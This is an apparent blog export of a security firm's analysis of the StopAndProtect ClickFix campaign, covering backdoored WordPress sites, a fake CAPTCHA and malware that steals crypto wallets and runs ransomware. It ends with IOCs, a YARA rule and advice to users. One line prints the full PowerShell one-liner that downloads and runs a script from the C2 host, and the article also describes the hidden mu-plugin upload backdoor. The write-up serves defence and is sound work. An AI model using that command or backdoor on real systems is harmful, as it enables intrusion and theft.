{"id":25650,"date":"2026-09-29T15:26:06","date_gmt":"2026-09-29T08:26:06","guid":{"rendered":"https:\/\/fpt-is.com\/en\/?post_type=goc_nhin_so&#038;p=25650"},"modified":"2026-09-29T15:28:23","modified_gmt":"2026-09-29T08:28:23","slug":"nearly-2000-wordpress-websites-taken-over-the-secret-behind-the-stopandprotect-campaign","status":"publish","type":"goc_nhin_so","link":"https:\/\/fpt-is.com\/en\/insights\/nearly-2000-wordpress-websites-taken-over-the-secret-behind-the-stopandprotect-campaign\/","title":{"rendered":"Nearly 2,000 WordPress websites taken over: The secret behind the StopAndProtect Campaign"},"content":{"rendered":"<p>Do you believe that just one click on the familiar &#8220;I&#8217;m not a robot&#8221; (CAPTCHA) verification box can empty your cryptocurrency wallet and turn your computer into a &#8220;slave&#8221; in a global criminal network?<\/p>\n<p>In May 2026, cybersecurity experts at Check Point Research exposed StopAndProtect &#8211; a large-scale underground campaign that was silently turning nearly 2,000 reputable WordPress websites into digital &#8220;minefields&#8221;. However, this is not simply an ordinary malware distribution. What&#8217;s hidden behind this campaign will make you go from surprise to surprise:<\/p>\n<ul>\n<li>Spooky ClickFix trick: How can a fake CAPTCHA message trick an unsuspecting victim into applying malicious code to his or her computer?<\/li>\n<li>The &#8220;Swiss Knife&#8221; of criminals: Why is StopAndProtect not just ransomware, but also a multi-purpose arsenal\u2014automatically ransacking Crypto wallets, hijacking WhatsApp to spy on contacts, and silently taking screenshots of victims every 30 seconds?<\/li>\n<li>The most absurd &#8220;self-squeezing&#8221; phase in history (The OPSEC Blunder): The most dramatic part of the campaign lies in the fact that the mastermind made a fatal mistake: Infecting his own personal computer with malware! It was this humorous incident that accidentally gave the security world an archive of 31,000 secret screen photos, along with all botnet operating tools written in the language&#8230; Visual Basic 6 from the 90s.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-1-1790668152.webp\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-25651\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-1-1790668152.webp\" alt=\"Clickfix Fpt Is 1 1790668152\" width=\"1024\" height=\"559\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-1-1790668152.webp 1024w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-1-1790668152-700x382.webp 700w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/p>\n<p>ClickFix (combined from Click and Fix) is an extremely dangerous new generation Social Engineering technique.<\/p>\n<ul>\n<li>Difference from traditional scams: Previously, hackers often tricked you into downloading an .exe or .zip file and opening it. However, modern browsers (Chrome, Edge) and anti-virus software will warn you as soon as you download strange files.<\/li>\n<li>How ClickFix overcomes the barrier: ClickFix does not download any files to the hard disk. Instead, it takes advantage of users&#8217; trust and habits, tricking you into manually copying and pasting malicious commands into the system. Because you are the one executing the command, security software often mistakes it as a valid operation by the administrator!<\/li>\n<\/ul>\n<h2 id=\"wordpress-slave-network-hackers-stealth-infrastructure\"><span style=\"color: #000080\">WordPress &#8220;slave&#8221; network \u2013 Hackers&#8217; stealth infrastructure<\/span><\/h2>\n<p>To start a large-scale phishing campaign, an attacker needs a server to host malicious code and control the attack. Instead of spending money to rent a private server (which is easily tracked and locked by cyber police), the StopAndProtect group chose to take over nearly 2,000 less secure WordPress websites around the world.<\/p>\n<h3 id=\"great-move-stealth-backdoor-via-mu-plugins\">Great move &#8220;Stealth Backdoor&#8221; via MU-Plugins:<\/h3>\n<p>Hacked websites mainly ran old versions of WordPress (as of 2021, with up to 40 vulnerabilities) or installed unpatched plugins. Attackers set up shop on these websites using an extremely sophisticated technique:<\/p>\n<ol>\n<li>Installing Must-Use Plugin (MU-Plugin): The attacker uploads the script file mu-uploader-installer.php. This script silently creates a special plugin at wp-content\/mu-plugins\/wp-sec.php.To put it simply: In WordPress, MU-Plugin is a &#8220;must-run&#8221; plugin &#8211; it starts automatically every time someone visits the website but is completely not displayed in the Plugin list in the admin interface. Administrators are very difficult to detect!<\/li>\n<li>Create a Backdoor (Hidden REST API Endpoint): This hidden plugin opens the \/wp-json\/wp-sec\/v1\/upload port. An attacker only needs to send a request with a hardcoded password to be able to upload any malicious file (including a .php file to take over the entire server).<\/li>\n<li>Delete installation traces: Immediately after setting up the backdoor, the original installation file self-deletes, causing all traces to disappear.<\/li>\n<\/ol>\n<h2 id=\"clickfix-script-how-sophisticated-is-the-captcha-trick\"><span style=\"color: #000080\">&#8220;ClickFix&#8221; script \u2013 How sophisticated is the CAPTCHA trick?<\/span><\/h2>\n<h3 id=\"step-1-target-screening-amp-environmental-testing\">Step 1: Target screening &amp; environmental testing<\/h3>\n<p>When you access a WordPress website that has been taken over by hackers, the verify.php malicious script hidden on the server will immediately launch a hidden checker:<\/p>\n<ol>\n<li>User-Agent Check:\n<ul>\n<li>If the browser sends information as Windows OS \u2794 Enable ClickFix trap.<\/li>\n<li>If it is macOS, Linux, Android or iOS \u2794 Skip, allow normal website content viewing.<\/li>\n<\/ul>\n<\/li>\n<li>Purpose of screening:\n<ul>\n<li>Avoid raising suspicion among users traveling by phone or Mac.<\/li>\n<li>Make sure the PowerShell command you are about to launch will run 100% successfully (because only Windows operating systems have PowerShell by default).<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-2-1790668242.webp\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-25652\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-2-1790668242.webp\" alt=\"Clickfix Fpt Is 2 1790668242\" width=\"369\" height=\"286\" \/><\/a><\/p>\n<h3 id=\"step-2-overlay-fake-captcha-interface-ui-overlay\">Step 2: Overlay fake CAPTCHA interface (UI Overlay)<\/h3>\n<p>As soon as it is determined that the victim uses Windows, a fake window covers the entire screen (Overlay), obscuring the original website content.<\/p>\n<ul>\n<li>Extremely realistic appearance: The interface is designed to imitate reputable verification services such as Google reCAPTCHA, Cloudflare or hCaptcha with safety lock icons, the words &#8220;Security Check&#8221; or &#8220;Verify you are human&#8221;.<\/li>\n<li>Create a fake problem: The screen displays an error message such as: &#8220;Your browser is having trouble connecting securely. Please click verify to continue accessing.&#8221;<\/li>\n<\/ul>\n<h3 id=\"step-3-kidnapping-the-temporary-memory\">Step 3: &#8220;Kidnapping&#8221; the temporary memory<\/h3>\n<p>This is ClickFix&#8217;s key underground technical link:<\/p>\n<ol>\n<li>As soon as the victim clicks on the &#8220;I am not a robot&#8221; box or the &#8220;Verify&#8221; button, a background JavaScript script (vcapcha.js file) in the browser is immediately activated.<\/li>\n<li>This script calls the browser&#8217;s system command navigator.clipboard.writeText(&#8230;) to silently copy an extremely complex PowerShell malware script into the victim&#8217;s RAM\/Clipboard without emitting any sound or warning.<\/li>\n<\/ol>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-3-1790668292.webp\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-25653\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-3-1790668292.webp\" alt=\"Clickfix Fpt Is 3 1790668292\" width=\"875\" height=\"110\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-3-1790668292.webp 875w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-3-1790668292-700x88.webp 700w\" sizes=\"(max-width: 875px) 100vw, 875px\" \/><\/a><\/p>\n<h3 id=\"step-4-psychological-manipulation-trick-the-victim-into-self-activation\">Step 4: Psychological manipulation \u2013 Trick the victim into &#8220;self-activation&#8221;<\/h3>\n<p>Once the malicious code is in the cache, the fake CAPTCHA screen changes its interface, displaying a 3-step guide that looks very &#8220;technical&#8221; but is actually a trap:<\/p>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-4-1790668329.webp\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-25654\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-4-1790668329.webp\" alt=\"Clickfix Fpt Is 4 1790668329\" width=\"328\" height=\"436\" \/><\/a><\/p>\n<p>Analyze the victim&#8217;s psychology in this step:<\/p>\n<ul>\n<li>The victim thinks that the text he pasted is a secure verification code\/token string.<\/li>\n<li>The operation Win + R (opens the Run dialog box) and Ctrl + V happens very quickly (only takes 2-3 seconds), the victim does it reflexively without thinking or checking to see what the command line they pasted actually contains.<\/li>\n<\/ul>\n<h3 id=\"step-5-execute-implicit-command\">Step 5: Execute implicit command<\/h3>\n<p>As soon as the victim presses Enter, the Windows Run dialog box will execute the malicious PowerShell command. Let&#8217;s unpack the technical meaning of this command:<\/p>\n<p><code>powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('https:\/\/&lt;C2&gt;\/vcapcha.ps1'))<\/code><\/p>\n<ul>\n<li>-w hidden (WindowStyle Hidden): Completely hide the PowerShell black window. After pressing Enter, the victim will not see any windows appear, thinking that the system is &#8220;silently verifying&#8221;.<\/li>\n<li>-ep bypass (ExecutionPolicy Bypass): Ignore all policies that prevent running Windows script files (Execution Policy). IEX (Invoke-Expression): Directly execute code downloaded from the internet right on RAM memory without saving the file to the hard disk.<\/li>\n<li>DownloadString(&#8216;&#8230;\/vcapcha.ps1&#8217;): Download the main infection script vcapcha.ps1 from the hacked WordPress server.<\/li>\n<\/ul>\n<h3 id=\"step-6-report-log-to-c2-server-amp-transition-to-stage-2\">Step 6: Report log to C2 server &amp; transition to Stage 2<\/h3>\n<p>As soon as the vcapcha.ps1 code runs successfully:<\/p>\n<ul>\n<li>Sending reconnaissance data: The malicious code sends an HTTP request containing the victim&#8217;s IP, execution time, and Windows version to Endpoint \/wp-content\/plugins\/verify\/proxy.php on the hijacked WordPress website.<\/li>\n<li>Activate the next infection chain: Decode and load Stage 1 &amp; Stage 2 (.NET Loaders) into RAM to prepare to deploy the Crypto wallet and Ransomware theft weapon set (Stage 3).<\/li>\n<li>Return the interface: The fake CAPTCHA screen disappears, the browser automatically refreshes (Reloads) the original website. The victim calmly read the newspaper\/watched the website without knowing that his computer was completely controlled!<\/li>\n<\/ul>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-5-1790668374.webp\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-25655\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-5-1790668374.webp\" alt=\"Clickfix Fpt Is 5 1790668374\" width=\"637\" height=\"472\" \/><\/a><\/p>\n<h3>Summary of the process with a comparison table<\/h3>\n<table>\n<colgroup>\n<col \/>\n<col \/>\n<col \/><\/colgroup>\n<tbody>\n<tr>\n<td><strong>Criteria<\/strong><\/td>\n<td><strong>Old scam method<\/strong><\/td>\n<td><strong>ClickFix scenario (New)<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>Victim&#8217;s actions<\/strong><\/td>\n<td>Download .exe\/.zip file \u2794 Open file \u2794 Install.<\/td>\n<td>Click CAPTCHA \u2794 Press Win+R \u2794 Ctrl+V \u2794 Enter.<\/td>\n<\/tr>\n<tr>\n<td><strong>Browser warnings<\/strong><\/td>\n<td>Displays warning: &#8220;This file may be harmful&#8221;.<\/td>\n<td>No warning at all (due to manual command pasting).<\/td>\n<\/tr>\n<tr>\n<td><strong>Disk storage<\/strong><\/td>\n<td>Writes malicious file to the hard drive.<\/td>\n<td>Runs directly in RAM (In-Memory Execution).<\/td>\n<\/tr>\n<tr>\n<td><strong>Antivirus (AV) evasion<\/strong><\/td>\n<td>Easily detected by Antivirus when writing to disk.<\/td>\n<td>Extremely high Antivirus evasion rate.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 id=\"stage-3-multi-purpose-weapon-set-from-crypto-wallet-theft-to-extortion\"><span style=\"color: #000080\">Stage 3 Multi-purpose weapon set \u2013 From Crypto Wallet theft to extortion<\/span><\/h2>\n<p>Once deep inside the computer, StopAndProtect begins activating destructive modules depending on the hacker&#8217;s purpose.<\/p>\n<h3 id=\"silentdatacollector-silent-thief-hunting-crypto-wallets\">SilentDataCollector \u2013 &#8220;Silent thief&#8221; hunting Crypto Wallets<\/h3>\n<p>This is the most dangerous module for crypto investors:<\/p>\n<ul>\n<li>Automatically extract Crypto Wallet: Wipe hard drive, compress and encrypt files containing recovery phrase (Seed Phrase), browser password, cryptocurrency wallet file in the format: &lt;DEVICE_NAME&gt;wallet_V_&lt;DATE_TIME&gt;.zip.encrypted<\/li>\n<li>Spying with WhatsApp Automation: Attacker sends keywords (contact name) from C2 down. The malicious code waits for the victim not to use the device, then automatically controls WhatsApp (Web\/Desktop version), types keywords into the search box, opens contact information and takes a screenshot to get the target&#8217;s phone number.<\/li>\n<li>Take continuous screenshots: Automatically capture the victim&#8217;s working screen every 30 seconds.<\/li>\n<li>Smart Keylogger: Record every keystroke and automatically filter out valid Email addresses\/Accounts.<\/li>\n<\/ul>\n<h3 id=\"silentencryptor-data-encryption-ransomware\">SilentEncryptor (Data encryption ransomware)<\/h3>\n<ul>\n<li>Encrypt all data or computers with names (Hostname) specified from C2.<\/li>\n<li>The 32-byte AES encryption key is combined from the machine name and password of each file.<\/li>\n<li>Display ransom notice and payment instructions via Bitcoin\/USDT.<\/li>\n<\/ul>\n<h3 id=\"networksharescanner-amp-vbs-spreader\"><strong>NetworkShareScanner &amp; VBS spreader<\/strong><\/h3>\n<ul>\n<li>Automatically scans shared network drives (SMBs) and USB devices plugged into the machine to replicate malware to other computers on the same corporate LAN.<\/li>\n<\/ul>\n<h3 id=\"lock-phone-amp-chat-blackmail\">Lock phone &amp; chat blackmail<\/h3>\n<ul>\n<li>LockScreen: Locks the keyboard and mouse, turns the screen into a ransom notice with a QR code.<\/li>\n<li>SimpleChatProxy: Opens a live chat application between the victim and the hacker to negotiate the decryption price.<\/li>\n<\/ul>\n<h2 id=\"victim-statistics-amp-geographic-distribution-map\"><span style=\"color: #000080\">Victim statistics &amp; geographic distribution map<\/span><\/h2>\n<p>As of July 24, 2026, the StopAndProtect campaign has successfully infected over 6,000+ unique IP addresses.<\/p>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-6-1790669233.webp\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-25656\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-6-1790669233.webp\" alt=\"Clickfix Fpt Is 6 1790669233\" width=\"774\" height=\"412\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-6-1790669233.webp 774w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/09\/Clickfix-FPT-IS-6-1790669233-700x373.webp 700w\" sizes=\"(max-width: 774px) 100vw, 774px\" \/><\/a><\/p>\n<h2 id=\"ioc\"><span style=\"color: #000080\">IOC<\/span><\/h2>\n<table>\n<colgroup>\n<col \/>\n<col \/><\/colgroup>\n<tbody>\n<tr>\n<td>compromised websites<\/td>\n<td>maximumrock[.]ro<br \/>\nplatinumcar[.]ca<br \/>\n<a class=\"text-primary underline underline-offset-2 hover:text-primary\/80 cursor-pointer\" href=\"http:\/\/norakremer.co\/\" target=\"_self\" rel=\"noopener noreferrer nofollow ugc\">norakremer.co<\/a>[.]uk<br \/>\npharmart[.]ae<br \/>\nksr-racingparts[.]com<\/td>\n<\/tr>\n<tr>\n<td>compromised base C&amp;C websites<\/td>\n<td><a class=\"text-primary underline underline-offset-2 hover:text-primary\/80 cursor-pointer\" href=\"http:\/\/v-k.com\/\" target=\"_self\" rel=\"noopener noreferrer nofollow ugc\">v-k.com<\/a>[.]ua<br \/>\nwww.lapellelaser[.]pl<br \/>\nwww.parsrulman[.]com<br \/>\nmectcalcutta[.]com<br \/>\ndischerniation[.]com<\/td>\n<\/tr>\n<tr>\n<td>PowerShell script stage 1<\/td>\n<td>cab7f141fd6f2c58055b3731ef6a64b8a2d4d88a974770b047da19c0904322f0<\/td>\n<\/tr>\n<tr>\n<td>PowerShell script stage 2<\/td>\n<td>cc8aa2bd7bf74ca0bbc5cb03a7b18eae73094b450d11654528c05685fe12e0c9<\/td>\n<\/tr>\n<tr>\n<td>stage 1 \u2013 downloader<\/td>\n<td>99bcb531d6dd3c93d3f28f03d6e4659c865a4ffbd2fb514e809017f3446a940b<br \/>\n8337bf29100a5871b1275227006dc2a43b21b751e5ce7e2032364fd78af59ac5<br \/>\n4dee2fe98d4da75ffb259c03b50202212dafc85691429a28641a8068eddea504<\/td>\n<\/tr>\n<tr>\n<td>stage 2 \u2013 downloader &amp; loader<\/td>\n<td>9765b1342cc7eb982a73bb1f94c6c500b63dc817073b76ea926c1097078d3527<br \/>\n7d3604d0728b242c72bd144b8661ebf63c1042a4f5dd441bc8c8507c701df20c<br \/>\n976cfa57e1efacbe517b7e3441e9473d275ec1d9ad8ab69ddf8ae3a966aaa153<\/td>\n<\/tr>\n<tr>\n<td>stage 3 \u2013 encryptor<\/td>\n<td>b79b9b027f76579555069a7506d946648a8cb3126c0dda837dc9fee0e5c79489<br \/>\n65550f6d0ffec8421f703cdc7273d9c0563b3d480fe6702bad294a18afe72143<br \/>\n0080d0dd72eda4850a02e51c0e5c6f768423dfe970cafae2ab52ceee75972b40<\/td>\n<\/tr>\n<tr>\n<td>stage 3 \u2013 SMB\/USB worm<\/td>\n<td>8d1e23630a6695fa9c793d73832f59436c98bba30ed81c16d01b549bd17feab4<br \/>\n10babb15e08f9fbd72cce11713a273b971c910dd5bdb989a3f6ff4d9c8e372c0<br \/>\nf042240c3de00c46dee625916bf246b7e87481e4081a6a97208b091409766e41<\/td>\n<\/tr>\n<tr>\n<td>stage 3 \u2013 lockscreen<\/td>\n<td>11a635d70444605ede1de0aa227a9fd7cfa4554e75bea93ce18b639ca571a42e<br \/>\n2adbb2c206be7f23bf77f8f50d1ac0f809511c0b4591421931f81a6eaa42c68c<br \/>\n38602b76f6c65644b01fa4d81708251c159a883253cda8876396dc7212324ab9<\/td>\n<\/tr>\n<tr>\n<td>stage 3 \u2013 credential stealer<\/td>\n<td>23cbabfe3ca3a7f1eb365f772d6a4ed8095cb8f7755622cc82e804478259dc70<\/td>\n<\/tr>\n<tr>\n<td>stage 3 \u2013 VBS spreader<\/td>\n<td>b3dff910b350ace27d64cbd79405cb154a1967e366d7b88170c3e8303b1d08ad<\/td>\n<\/tr>\n<tr>\n<td>stage 3 \u2013 chat utility<\/td>\n<td>3ed8f2cc8da4853fd770ff38f0cbce6d9d4a84e75a828fc0cec3e3ec60db94f9<br \/>\n3ba161ca7b8dcf389ec3236c9ddfb943e9d1766181b1b81a227649cad46132a8<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 id=\"yara-rule\"><span style=\"color: #000080\"><strong>Yara Rule<\/strong><\/span><\/h2>\n<p>rule StopAndProtectOperation<\/p>\n<p><strong>{<\/strong><\/p>\n<p>meta:<\/p>\n<p>description = &#8220;Detects StopAndProtect Operation&#8221;<\/p>\n<p>author = &#8220;Check Point Research&#8221;<\/p>\n<p>date = &#8220;2026-05-26&#8221;<\/p>\n<p>modified = &#8220;2026-05-26&#8221;<\/p>\n<p>hash = &#8220;712E557373FBA45BDD66D52E395B8AF7CCF7006E6E82D4E1DB0736E738D0D4FB&#8221;<\/p>\n<p>strings:<\/p>\n<p>$a = &#8220;C:\\\\Users\\\\marks\\\\source\\\\&#8221;<\/p>\n<p>condition:<\/p>\n<p>all\u00a0<strong>of<\/strong>\u00a0them<\/p>\n<p><strong>}<\/strong><\/p>\n<h2 id=\"recommendation\"><span style=\"color: #000080\">Recommendation<\/span><\/h2>\n<h3 id=\"absolutely-do-not-run-command-win-r-ctrl-v-enter\">Absolutely DO NOT run command Win + R \u2794 Ctrl + V \u2794 Enter<\/h3>\n<ul>\n<li>There are no CAPTCHAs or verification services that require you to manually paste a PowerShell command into your computer. Seeing this claim = 100% ClickFix Scam!<\/li>\n<\/ul>\n<h3 id=\"tips-for-trying-with-notepad\">Tips for trying with Notepad<\/h3>\n<ul>\n<li>If you accidentally press the button to verify your doubt, open Notepad and paste (Ctrl + V) there first. If you see a powershell command appear&#8230; \u2794 Delete it now, you just avoided a scam!<\/li>\n<\/ul>\n<h3 id=\"protect-crypto-wallets-at-all-costs\">Protect Crypto Wallets at all costs<\/h3>\n<ul>\n<li>DO NOT save 12\/24 recovery words (Seed Phrase) or Private Key as text files, photos on your computer or Cloud.<\/li>\n<li>ONLY write on paper\/engrave metal and keep in a safe place.<\/li>\n<li>Use Hardware Wallet (Ledger, Trezor) for large assets.<\/li>\n<\/ul>\n<h3 id=\"password-management-amp-computer-cleanup\">Password management &amp; computer cleanup<\/h3>\n<ul>\n<li>DO NOT save passwords in the browser (malicious code is easy to steal). Use your own password manager (Bitwarden, 1Password) + Enable 2FA via the app.<\/li>\n<li>DO NOT download cracking software (Crack\/Keygen) because this is the main way to spread malware.<\/li>\n<\/ul>\n<h2 id=\"references\"><span style=\"color: #000080\">References<\/span><\/h2>\n<p><a href=\"https:\/\/research.checkpoint.com\/2026\/thousands-of-hacked-wordpress-sites-one-operation-unmasking-stopandprotect\/\" target=\"_blank\" rel=\"noopener ugc nofollow\">https:\/\/research.checkpoint.com\/2026\/thousands-of-hacked-wordpress-sites-one-operation-unmasking-stopandprotect\/<\/a><\/p>\n<p><a href=\"https:\/\/thehackernews.com\/2026\/08\/stopandprotect-uses-nearly-2000-hacked.html\" target=\"_blank\" rel=\"noopener ugc nofollow\">https:\/\/thehackernews.com\/2026\/08\/stopandprotect-uses-nearly-2000-hacked.html<\/a><\/p>\n<p><a href=\"https:\/\/www.cryptopolitan.com\/it\/2000-hacked-wordpress-traps-crypto-users\/\" target=\"_blank\" rel=\"noopener ugc nofollow\">https:\/\/www.cryptopolitan.com\/it\/2000-hacked-wordpress-traps-crypto-users\/<\/a><\/p>\n<table style=\"border-collapse: collapse;width: 100%\">\n<tbody>\n<tr>\n<td style=\"width: 100%\">\n<p data-start=\"0\" data-end=\"210\" data-is-last-node=\"\" data-is-only-node=\"\"><strong>Exclusive article by experts from\u00a0<span class=\"hover:entity-accent entity-underline inline cursor-pointer align-baseline\"><span class=\"whitespace-normal\">FPT IS<\/span><\/span>,\u00a0<span class=\"hover:entity-accent entity-underline inline cursor-pointer align-baseline\"><span class=\"whitespace-normal\">FPT Corporation<\/span><\/span><\/strong><\/p>\n<p data-start=\"0\" data-end=\"210\" data-is-last-node=\"\" data-is-only-node=\"\"><br data-start=\"110\" data-end=\"113\" \/><em>Luu Tuan Anh \u2013 Information Security &amp; Cybersecurity Center,\u00a0<span class=\"hover:entity-accent entity-underline inline cursor-pointer align-baseline\"><span class=\"whitespace-normal\">FPT IS<\/span><\/span><\/em><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"author":21,"featured_media":25657,"parent":0,"template":"","nang_luc":[790,821],"danh_muc_goc_nhin_so":[789],"dich_vu":[],"linh_vuc":[],"platform":[],"san_pham":[],"the_goc_nhin_so":[],"class_list":["post-25650","goc_nhin_so","type-goc_nhin_so","status-publish","has-post-thumbnail","hentry","nang_luc-experts-sharing","nang_luc-security","danh_muc_goc_nhin_so-expert-sharing"],"acf":[],"_links":{"self":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so\/25650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so"}],"about":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/types\/goc_nhin_so"}],"author":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/users\/21"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media\/25657"}],"wp:attachment":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media?parent=25650"}],"wp:term":[{"taxonomy":"nang_luc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/nang_luc?post=25650"},{"taxonomy":"danh_muc_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/danh_muc_goc_nhin_so?post=25650"},{"taxonomy":"dich_vu","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/dich_vu?post=25650"},{"taxonomy":"linh_vuc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/linh_vuc?post=25650"},{"taxonomy":"platform","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/platform?post=25650"},{"taxonomy":"san_pham","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/san_pham?post=25650"},{"taxonomy":"the_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/the_goc_nhin_so?post=25650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}